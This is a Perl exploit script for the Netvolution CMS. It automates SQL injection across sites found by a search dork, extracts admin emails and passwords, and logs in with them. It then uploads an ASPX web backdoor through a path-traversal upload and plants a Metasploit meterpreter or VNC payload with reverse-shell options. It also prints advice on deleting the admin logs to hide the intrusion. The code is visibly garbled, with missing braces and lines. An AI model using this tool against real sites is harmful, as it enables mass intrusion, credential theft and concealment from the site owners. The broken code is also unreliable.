# #
# Exploit Title: Netvolution exploit script for CMS Version >= 2.xx.xx.xx #
# Date: 10/6/2010 #
# Sotware Link: www.netvolution.net #
# Bug found : amquen, krumel #
# Exploited by: krumel #
# Exploit Coded: mr.pr0n #
# #
# Many thanks to icesurfer (author of SQLNINJA) and all p0wnbox members. #
# I have contact www.atcom.gr no response yet, although it seems that they have patch #
# partially the software. #
# #
# This program is free software; you can redistribute it and/or #
# modify it under the terms of the GNU General Public License #
# as published by the Free Software Foundation; either version 2 #
# of the License, or (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program; if not, write to the Free Software #
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA02111-1307, USA. #
# #
#Using some modules!
use LWP::UserAgent;
use IO::Socket;
use IO::Handle;
print "\e[1;31m_ ___ _ __ _ _ \e[0m\n";
print "\e[1;31m | \\ | || || | | | (_)| | (_) | \e[0m\n";
print "\e[1;31m |\\| | ___| |___ _____ | |_ _| |_ _____ __________ __ | | ____| |_ \e[0m\n";
print "\e[1;31m | . ` |/ _ \\ __\\ \\ / / _ \\| | | | | __| |/ _ \\| '_ \\/ _ \\ \\/ / '_ \\| |/ _ \\| | __| \e[0m\n";
print "\e[1;31m | |\\|__/ |_ \\ V / (_) | | |_| | |_| | (_) | | | ||__/><| |_) | | (_) | | |_ \e[0m\n";
print "\e[1;31m |_| \\_|\\___|\\__| \\_/ \\___/|_|\\__,_|\\__|_|\\___/|_| |_| \\___/_/\\_\\ .__/|_|\\___/|_|\\__| \e[0m\n";
print "\e[1;31m| | \e[0m\n";
print "\e[1;31m|_|...for CMS Version >= 2.xx.xx.xx \e[0m\n";
# ************* #
# Target dork.
# ************* #
print "\nGoogle Dork:";
print "\n\e[1;45mallinurl: 'default.asp?pid'\e[0m\n";
# ************ #
# Main Menu.
# ************ #
print "\n[*] Main Menu:\n";
print "1. Automated list site scan for injection.\n";
print "2. Export all Infomation_Schema Tables and Columns.\n";
print "3. Find all Databases.\n";
print "4. Export all usernames and passwords of the 'cms_Users' table.\n";
print "5. Manuall exploitation.\n";
print "6. Compatibility with the Metasploit Framework.\n";
print "7. Exit.\n";
print "> ";
print "\n";
if ($option!=1 && $option!=2 && $option!=3 && $option!=4 && $option!=5 && $option!=6 && $option!=7)
print "\e[1;31mWrong Option!!\e[0m\n";
goto menu;
# Select Option.
if ($option==1)
{&site_scan} # Automated list site scan for injection.
if ($option==2)
{&info_schema_tables_and_columns}# Export all Infomation_Schema Tables and Columns.
if ($option==3)
{&extract_db}# Find all Databases.
if ($option==4)
{&automated_exploitation}# Export all usernames and passwords of the 'cms_Users'table.
if ($option==5)
{&manually}# Manuall exploitation.
if ($option==6)
{&metasploit}# Compatibility with Metasploit Project (Under construction).
if ($option==7)
{&quit}# Quit it!
# ******************************************* #
# Automated list site scan for injection.
# ******************************************* #
sub site_scan
$sites= "/Users/pentest/Desktop/sites.txt"; ########***[E_D_I_TH_E_R_E]***##############
$scan = "10+and+1=convert(int,db_name(1))";
# Counter
$i = 1;
print " [*]Opening site list... \n";
open (SITELIST, $sites);
print " [*]Sitelist opened successfully!\n";
print " [*]Scanning...\n";
@sitelist = <SITELIST>;
print " [*]Results:\n";
for ($i; $i <= @sitelist; $i++)
$host = $sitelist[$i];
chop ($host);
$int = LWP::UserAgent->new() or die;
if ($check->content =~ m/value '(.*)' to/g)
print "\e[1;36m$host\e[0m\n";
goto menu;
# ********************************************************** #
# Exploiting *all* the Infomation_Schema Tables and Columns.
# ********************************************************** #
sub info_schema_tables_and_columns
# ***************#
# Table Counter
# ***************#
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
print "> ";
print "Enter the range scanning of Tables (e.g.: 15): \n";
print "> ";
$endt =<STDIN>;
# Counter
$countt = 1;
print "\n [*] Exloiting Information_Schema Tables...\n";
$infoschema_t = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20table_name%20from%20Information_Schema.tables))";
$int = LWP::UserAgent->new() or die;
if ($check->content =~ m/value '(.*)' to/g)
($first_t) = $1;
print "\e[1;33m$first_t\e[0m\n";
@chars_t = split(//, "$first_t");
$got_t = join("%", @chars_t);
$first_t = "%27$got_t%27";
for ($countt; $countt <= $endt; $countt++)
$fullsqli_t = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20table_name%20from%20Information_Schema.tables%20where%20table_name%20not%20in($first_t)))";
$int = LWP::UserAgent->new() or die;
if ($check->content =~ m/value '(.*)' to/g)
($next_t) = $1;
print "\e[1;33m$next_t\e[0m\n";
@chars_t = split(//, "$next_t");
$got_t = join("%", @chars_t);
$next_t = $got_t ;
$first_t = $first_t.",%27".$next_t."%27";
print "\e[1;31mFAILED!\e[0m\n";
# ***************#
# Column Counter
# ***************#
print "Enter the range of scanning Columns (e.g.: 20)\n";
print "> ";
$endc =<STDIN>;
# Counter
$countc = 1;
print "[*] Exloiting Information_Schema Column...\n";
$infoschema_c = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20column_name%20from%20Information_Schema.columns))";
$int = LWP::UserAgent->new() or die;
if ($check->content =~ m/value '(.*)' to/g)
($first_c) = $1;
print "\e[1;33m$first_c\e[0m\n";
@chars_c = split(//, "$first_c");
$got_c = join("%", @chars_c);
$first_c = "%27$got_c%27";
for ($countc; $countc <= $endc; $countc++)
$fullsqli_c = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20column_name%20from%20Information_Schema.columns%20where%20column_name%20not%20in($first_c)))";
$int = LWP::UserAgent->new() or die;
if ($check->content =~ m/value '(.*)' to/g)
($next_c) = $1;
print "\e[1;33m$next_c\e[0m\n";
@chars_c = split(//, "$next_c");
$got_c = join("%", @chars_c);
$next_c = $got_c ;
$first_c = $first_c.",%27".$next_c."%27";
print "\e[1;31mFAILED!\e[0m";
goto menu;
# *************************************** #
# Exploiting *all* the inside Databases.
# *************************************** #
sub extract_db
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
print "> ";
print "Enter the range of scanning Databases (e.g.: 30)\n";
print "> ";
$enddb =<STDIN>;
# Counter
$countdb = 1;
print "[*] Exloiting the inside Databases....\n";
for ($countdb; $countdb <= $enddb; $countdb++)
$db = "10+and+1=convert(int,db_name($countdb))";
$int = LWP::UserAgent->new() or die;
if ($check->content =~ m/value '(.*)' to/g)
($database) = $1;
print "[ID:$countdb]","\e[1;35m$database\e[0m\n";
print "\e[1;31mFAILED!\e[0m\n";
goto menu;
# ***************************************************************** #
# Exploiting *all* usernames and passwords of the table "cms_Users"
# ***************************************************************** #
sub automated_exploitation
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
print "> ";
print "Enter the range of scanning userID (e.g.: 20)\n";
print "> ";
$end =<STDIN>;
# Counter
$count = 1;
print "[*] Exloiting Usernames and Passwords...\n";
for ($count; $count <= $end; $count++)
$useremail = "10+and+1=convert(int,(se%l%e%c%t(substring(useremail,1,1000))%20from%20cms_Users%20where%20userID=$count%29%29";
$userpassword = "10+and+1=convert(int,(se%l%e%c%t%20(substring(userpassword,1,10000))%20from%20cms_Users%20where%20userID=$count%29%29";
$int = LWP::UserAgent->new() or die;
if ($check->content =~ m/value '(.*)' to/g)
($email) = $1;
print "[ID:$count]"," \e[1;32m$email\e[0m";
$gotmail = $email; # Usage for the section of Metasploit Framework.
$int = LWP::UserAgent->new() or die;
if ($check->content =~ m/value '(.*)' to/g){
($pass) = $1;
print " : \e[1;32m$pass\e[0m\n";
$gotpass = $pass; # Usage for the section of Metasploit Framework.
print " : \e[1;31m-\e[0m\n";
print "[ID:$count","] \e[1;31m-\e[0m : \e[1;31m-\e[0m\n";
goto menu;
# **************************************** #
# Exploiting Columns and Tables manually.
# **************************************** #
sub manually
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
print "> ";
print "Enter the name of your target's Table (e.g.: cms_Users)\n";
print "> ";
$table =<STDIN>;
print "Enter your the name of your target's Column (e.g.: userpassword)\n";
print "> ";
$column =<STDIN>;
print "Enter the range of scanning (e.g.: 10)\n";
print "> ";
$endm =<STDIN>;
$countm = 1;
print "[*] Manuall Exploitation...\n";
for ($countm; $countm <= $endm; $countm++)
$manually = "10+and+1=convert(int,(se%l%e%c%t(substring($column,1,1000))%20from%20$table%20where%20userID=$countm%29%29";
$int = LWP::UserAgent->new() or die;
if ($check->content =~ m/value '(.*)' to/g){
($got) = $1;
print "[ID:$countm]"," \e[1;32m$got\e[0m\n";
print "[ID:$countm","] \e[1;31m-\e[0m : \e[1;31m-\e[0m\n";
goto menu;
# ***************************************************************** #
# Compatibility with the Metasploit Framework.
# ***************************************************************** #
sub metasploit
if (($gotmail eq "") or ($gotpass eq ""))
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
print "> ";
$end = 10;
$count = 1;
for ($count; $count < $end; $count++)
$useremail = "10+and+1=convert(int,(se%l%e%c%t(substring(useremail,1,1000))%20from%20cms_Users%20where%20userID=$count%29%29";
$userpassword = "10+and+1=convert(int,(se%l%e%c%t%20(substring(userpassword,1,10000))%20from%20cms_Users%20where%20userID=$count%29%29";
$int = LWP::UserAgent->new() or die;
if ($check->content =~ m/value '(.*)' to/g)
($email) = $1;
$gotmail = $email;
$int = LWP::UserAgent->new() or die;
if ($check->content =~ m/value '(.*)' to/g){
($pass) = $1;
$gotpass = $pass;
$end = $count;
if ($atcom =~ m/www.(.*).gr/g){
($site) = $1;
# Checking if the Metasploit Framework is already installed.
print "[*] Looking for the Metasploit Framework... ";
$msfcli = "";
$msfpayload = "";
if ($msfpath eq "") {
$path1 = $ENV{PATH};
@path = split(/:/,$path1);
foreach (@path) {
if (-e $_."/msfcli") {
$msfcli = $_."/msfcli";
} elsif (-e $_."/msfcli3") {
$msfcli = $_."/msfcli3";
if (-e $_."/msfpayload") {
$msfpayload = $_."/msfpayload";
} elsif (-e $_."/msfpayload3") {
$msfpayload = $_."/msfpayload3";
} else {
if (-e $msfpath."/msfcli") {
$msfcli = $msfpath."msfcli";
} elsif (-e $msfpath."/msfcli3") {
$msfcli = $msfpath."msfcli3";
if (-e $msfpath."/msfpayload") {
$msfpayload = $msfpath."msfpayload";
} elsif (-e $msfpath."/msfpayload3") {
$msfpayload = $msfpath."msfpayload3";
if ($msfcli eq ""){
print "[\e[1;31m FAILED \e[0m]\n";
print "[-] msfcli not found\n";
if ($msfpayload eq "") {
print "[\e[1;32m FAILED \e[0m]\n";
print "[-] msfpayload not found\n";
print "[\e[1;32m DONE \e[0m]\n";
#Retrieve Cookie
system('curl -k -L -b cookies.txt -c cookies.txt -o step-1.html http://www.'.$site.'.gr/');
system('curl -k -L -b cookies.txt -c cookies.txt-d email='.$gotmail.' -d password='.$gotpass.' -o step-2.html http://www.'.$site.'.gr/admin/default.asp?ac=2');
#Upload Web-Backdoor
system('curl -k -L -b cookies.txt -c cookies.txt -F name=file1 -F filename=@cmdasp.aspx http://www.'.$site.'.gr/admin/tools/files/filesUpload.asp?folder=..%2F..%2F..%2Ffiles');
# Choose your payload.
print "Which payload you want to use?\n";
print "1. Meterpreter\n2. VNC\n";
while (($payload ne 1) and ($payload ne 2)) {
print "msf > ";
$payload = <STDIN>;
if ($payload == 1) {
$payload = "meterpreter";
} else {
$payload = "vncinject";
# Choose your connection.
print "Which type of connection you want to use?\n";
print "1. bind_tcp\n2. reverse_tcp\n";
while (($conn ne "1") and ($conn ne "2")) {
print "msf > ";
$conn = <STDIN>;
if ($conn == 1) {
$conn = "bind_tcp";
} else {
$conn = "reverse_tcp";
if ($conn eq "bind_tcp"){
print "Enter your Remote host\n";
print "msf > ";
$rhost = <STDIN>;
chomp $rhost
} else {
print "Enter your Public IP\n";
print "msf > ";
$lhost = <STDIN>;
chomp $lhost ;
print "Enter your Local Host\n";
print "msf > ";
$lhost1 = <STDIN>;
chomp $lhost1 ;
if ($conn eq "bind_tcp"){
print "Enter Remote port number\n";
} else {
print "Enter local port number\n";
$port = 0;
while (($port < 1) or ($port > 65535)){
print "msf > ";
$port = <STDIN>;
# Choose your Encryption.
$enc = -1;
print "[*] Choose a payload encoding method:\n".
"1.Alpha2 Alphanumeric Mixedcase\n".
"2.Alpha2 Alphanumeric Uppercase\n".
"3.Avoid UTF8/tolower\n".
"4.Call+4 Dword XOR\n".
"5.Single-byte XOR Countdown\n".
"6.Variable-length Fnstenv/mov Dword XOR\n".
"7.Polymorphic Jump/Call XOR Additive Feedback\n".
" 10.Polymorphic XOR Additive Feedback\n".
" 11.Alpha2 Alphanumeric Unicode Mixedcase\n".
" 12.Alpha2 Alphanumeric Unicode Uppercase\n";
while (($enc < 0) or ($enc > 12))
print "msf > ";
$enc = <STDIN>;
$encoder = " encoder=";
for ($enc)
/^0$/ && do {$encoder = ""};
/^1$/ && do {$encoder .= "x86/alpha_mixed "};
/^2$/ && do {$encoder .= "x86/alpha_upper "};
/^3$/ && do {$encoder .= "x86/avoid_utf8_tolower "};
/^4$/ && do {$encoder .= "x86/call4_dword_xor "};
/^5$/ && do {$encoder .= "x86/countdown "};
/^6$/ && do {$encoder .= "x86/fnstenv_mov "};
/^7$/ && do {$encoder .= "x86/jmp_call_additive "};
/^8$/ && do {$encoder .= "x86/nonalpha "};
/^9$/ && do {$encoder .= "x86/nonupper "};
/^10$/ && do {$encoder .= "x86/shikata_ga_nai "};
/^11$/ && do {$encoder .= "x86/unicode_mixed "};
/^12$/ && do {$encoder .= "x86/unicode_upper "};
# Creation of the executable payload.
$exe = "backup".int(rand()*010101);
$command = $msfpayload." windows/".$payload."/".$conn.$encoder." exitfunc=process";
if ($conn eq "bind_tcp")
$command .= " lport=".$port." X > /tmp/".$exe.".exe";
} else {
$command .= " lport=".$port." lhost=".$lhost." X "."> /tmp/".$exe.".exe";
if ($verbose == 1)
print "[v] Command: ".$command."\n";
system ($command);
unless (-e "/tmp/".$exe.".exe") {
print "[-] Payload creation... [\e[1;31m FAILED \e[0m]\n";
print "[*] Payload creation... [\e[1;32m DONE \e[0m]\n";
print "[*] Payload (".$exe.".exe) created.\n";
$xpl = '/tmp/'.$exe.'.exe';
#Upload the executable file to the remote Webserver.
system('curl -k -L -b cookies.txt -c cookies.txt -F name=file1 -F filename=@'.$xpl.' http://www.'.$site.'.gr/admin/tools/files/filesUpload.asp?folder=..%2F..%2F..%2Ffiles');
$parameter = $exe.".exe";
# The child handles the request to the target, the parent calls Metasploit Framework!
$pid = fork();
if ($pid eq 0) {
# This is the parent.
$syscommand = $msfcli." exploit/multi/handler "."PAYLOAD=windows/".$payload."/".$conn." ";
if ($conn eq "bind_tcp")
$syscommand .= "LPORT=".$port." RHOST=".$rhost." E";
print "\e[1;34m$syscommand\e[0m\n";
} else {
$syscommand .= "LPORT=".$port." LHOST=".$lhost1." E";
print "\e[1;34m$syscommand\e[0m\n";
#Execute msfcli
print "Are you ready to execute msfcli? (Press Enter)\n";
print "msf > ";
$enter = <STDIN>;
print " Please Wait...";
print "[*] Executing the msfcli... [\e[1;32m DONE \e[0m]\n";
system("xterm -bg black -fg white -bd black -e ".$syscommand." &"); # If you don't have xterm, install IT!
sleep(30); # Sleep 30 seconds to fire up Metasploit Framework!
#Execute metasploit shell throught Web-Backdoor (cmdasp.aspx).
system('curl -k -L -b /tmp/cookies.txt -c /tmp/cookies.txt-d __VIEWSTATE=%2FwEPDwULLTE2MjA0MDg4ODhkZKAYI%2BuShUtjaEQHez7lnHYtwecj -d txtArg="C:\Inetpub\EventSites\enterpriseitsecurity.gr\files\\'.$parameter.'" -d testing=excute -d __EVENTVALIDATION=%2FwEWAwLw6bCOCgKa%2B%2BKPCgKBwth5tWrCE%2BPx6jReXWdJAVRgAZWRoxo%3Dhttp://www.'.$site.'.gr/files/cmdasp.aspx');
print "# ******************************************************************************#\n";
print "# ******************************************************************************#\n";
print "# In Order to delete the logs go tohttp://www.target.gr/files/cmdasp.aspx*#\n";
print "# and execute the following command :*#\n";
print "# *#\n";
print "# sqlcmd -S target_IP -U Database_User -P Database_Password -d Target_Database *#\n";
print "# -Q ''delete from cms_AdminLog where logRecDbTable='Your_Public_IP' '' -u *#\n";
print "# *#\n";
print "# The Username and password for the Database can be found inside global.asa*#\n";
print "# ******************************************************************************#\n";
# ***********#
# Quitting :D
# ***********#
sub quit
print "\e[1;31mExiting...Bye-Bye!\e[0m\n";
# ***************************************************************** #